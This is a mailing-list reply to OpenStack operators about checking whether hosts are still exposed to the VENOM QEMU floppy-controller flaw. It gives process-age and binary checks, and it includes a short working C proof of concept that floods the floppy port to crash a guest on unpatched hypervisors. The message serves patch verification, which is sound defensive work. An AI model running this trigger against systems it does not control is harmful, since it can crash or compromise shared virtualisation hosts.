On 06/04/2015 08:50 AM, Fox, Kevin M wrote:
> I'm not aware of any check that actually tests the vulnerability. Just checks 
> package versions.

Hi,

On the compute host you can check the process age using  "ps aux". The
START column for every qemu-system-* process should be more recent than
the date you updated. At least, any process older than May 13th still
has the bug.

Also, using PID, you can make sure /proc/$pid/exe is pointing to the new
binary and not a "(deleted)" one.


Within a guest, the condition of exploitation may vary from system to
system. A reproducer has been published here:
 http://seclists.org/oss-sec/2015/q2/448

Though it requires fast timing, here is an updated version to prod the
other vulnerable floppy command:

cat>venom.c<<EOF
#include <sys/io.h>
int main() {
    int i;
    iopl(3);
    for (i=0;i<10000000;i++)
        outsb(0x3f5,"\x8e\x00\x00\x00\x00\x00",6);
}
EOF
gcc -O2 venom.c && sudo ./a.out


This should crash an ubuntu-14.04 instance if qemu is still vulnerable.
However it's not 100% guaranteed and you better make sure qemu-kvm is
up-to-date and no old qemu instance are running.

Regards,
Tristan

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
OpenStack-operators mailing list
OpenStack-operators@lists.openstack.org
http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-operators

Reply via email to